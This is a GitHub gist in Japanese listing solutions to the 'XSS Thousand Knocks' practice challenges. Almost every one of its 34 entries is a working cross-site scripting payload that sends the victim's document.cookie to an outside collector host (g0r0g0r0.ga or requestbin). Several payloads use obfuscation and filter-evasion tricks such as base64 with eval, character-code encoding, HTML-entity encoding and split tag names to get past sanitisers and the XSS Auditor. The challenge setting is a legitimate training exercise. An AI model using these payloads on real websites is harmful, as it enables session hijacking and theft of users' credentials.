Skip to content

Instantly share code, notes, and snippets.

@shiv3

shiv3/XSS Thousand Knocks.md Secret

Last active Dec 5, 2018
Embed
What would you like to do?

1

そのまま

http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=%22http://g0r0g0r0.ga:8000/psdkrwps/?%22%2Bdocument.cookie

2

scriptタグ

q=<script>location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie</script>

3/4

imgタグ

q="><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

5

textareaタグを閉じる

</textarea><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

6

xmpタグを閉じる

q=</xmp><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

7

autofocus + onfocus

q=" autofocus onfocus="location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie"

8

'を閉じてonfocus

q=%27%20%20autofocus%20onfocus=location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie '

9

onfocus

q='' %20autofocus%20onfocus=location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie

10/11

javascript:で実行

q=javascript:location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie

12

innerHTMLでimgタグ

q=javascript:document.body.innerHTML+=`%3Cimg%20src=http://g0r0g0r0.ga:8000/psdkrwps?${document.cookie}%3E`

13

svg onloadlocation.hash

q=<svg%20onload=eval(atob(location.hash.substring(1)))>#bG9jYXRpb249Imh0dHA6Ly9nMHIwZzByMC5nYTo4MDAwL3BzZGtyd3BzLz8iK2RvY3VtZW50LmNvb2tpZQ==

14

自身のiframeを作成してdocument.domainを書き換える

http://3cb34c8407410e2d6c1d708b786ce69a0192b470.knock.xss.moe/?q=http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%228293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe%22;document.body.innerHTML+=`%3Cimg%20src=http://g0r0g0r0.ga:8000/psdkrwps?${document.cookie}%3E`

15

imgタグ

?q=<img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

16/17

javascript:

q=javascript:location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie

18

\'で関数を閉じる

q=\%27);location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie//

19

alert内でfetch()

q=%27%2bfetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%2b%27

20

scripscriptt => scriptでAuditor回避

q=%3Cscripscriptt%3Efetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%3C/scripscriptt%3E

21

onerrorscript => onerrorでAuditor回避

q=<img%20onerrorscript=fetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%20src=1>

22/23

eval(atob(location.hash.substring(1)))で実行

q=%3Cscript%3Eeval(atob(location.hash.substring(1)))%3C/script%3E#bG9jYXRpb249Imh0dHA6Ly9nMHIwZzByMC5nYTo4MDAwL3BzZGtyd3BzLz8iK2RvY3VtZW50LmNvb2tpZQ==

24

eval(atob(location.hash.substring(1)))で実行2

q=<svg%20onload=eval(location.hash.substring(1))>#fetch(String.fromCharCode(104,116,116,112,58,47,47,103,48,114,48,103,48,114,48,46,103,97,58,56,48,48,48,47,112,115,100,107,114,119,112,115,47,63)+document.cookie)

25

10文字以内のドメインを取る

もしくはis.gdとかで10文字ガチャするとか

q=%3Cscript%20src=//abcdefgh.ga%3E%3C/script%3E

26

b="<IMG SRC=1 ONERROR=" + "location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`".split("").map(s=>`&#X${s.charCodeAt().toString(16)};`).join("") + ">"
encodeURIComponent(b)

でunicodeでエンコーディングしたものを作成

=>

q=%3CIMG%20SRC%3D1%20ONERROR%3D%26%23X6c%3B%26%23X6f%3B%26%23X63%3B%26%23X61%3B%26%23X74%3B%26%23X69%3B%26%23X6f%3B%26%23X6e%3B%26%23X2e%3B%26%23X68%3B%26%23X72%3B%26%23X65%3B%26%23X66%3B%26%23X3d%3B%26%23X60%3B%26%23X68%3B%26%23X74%3B%26%23X74%3B%26%23X70%3B%26%23X3a%3B%26%23X2f%3B%26%23X2f%3B%26%23X72%3B%26%23X65%3B%26%23X71%3B%26%23X75%3B%26%23X65%3B%26%23X73%3B%26%23X74%3B%26%23X62%3B%26%23X69%3B%26%23X6e%3B%26%23X2e%3B%26%23X66%3B%26%23X75%3B%26%23X6c%3B%26%23X6c%3B%26%23X63%3B%26%23X6f%3B%26%23X6e%3B%26%23X74%3B%26%23X61%3B%26%23X63%3B%26%23X74%3B%26%23X2e%3B%26%23X63%3B%26%23X6f%3B%26%23X6d%3B%26%23X2f%3B%26%23X31%3B%26%23X32%3B%26%23X6b%3B%26%23X69%3B%26%23X68%3B%26%23X78%3B%26%23X7a%3B%26%23X31%3B%26%23X3f%3B%26%23X24%3B%26%23X7b%3B%26%23X64%3B%26%23X6f%3B%26%23X63%3B%26%23X75%3B%26%23X6d%3B%26%23X65%3B%26%23X6e%3B%26%23X74%3B%26%23X2e%3B%26%23X63%3B%26%23X6f%3B%26%23X6f%3B%26%23X6b%3B%26%23X69%3B%26%23X65%3B%26%23X7d%3B%26%23X60%3B%3E

27.

atobしたのをURLエンコーディング

encodeURIComponent(`location["href"]=atob("aHR0cDovL3JlcXVlc3RiaW4uZnVsbGNvbnRhY3QuY29tLzEya2loeHoxPw")+document["cookie"]`)

http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=<script>location%5B%22href%22%5D%3Datob(%22aHR0cDovL3JlcXVlc3RiaW4uZnVsbGNvbnRhY3QuY29tLzEya2loeHoxPw%22)%2Bdocument%5B%22cookie%22%5D</script>

28.

=> 26と同じ

29.

.が使えないので[""]でアクセス

q=location["href"]="http://requestbin\u002efullcontact\u002ecom/12kihxz1?")%2bdocument["cookie"]

## 30.

"も使えないのでバッククォートでアクセス

q=location[`href`]=`http://requestbin\u002efullcontact\u002ecom/12kihxz1?")`%2bdocument[`cookie`]

31.32.33

/で区切ってスペース

q=<img/onerror="location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`"src=>

34

body onload

q=<body/%20onload=location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`//
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.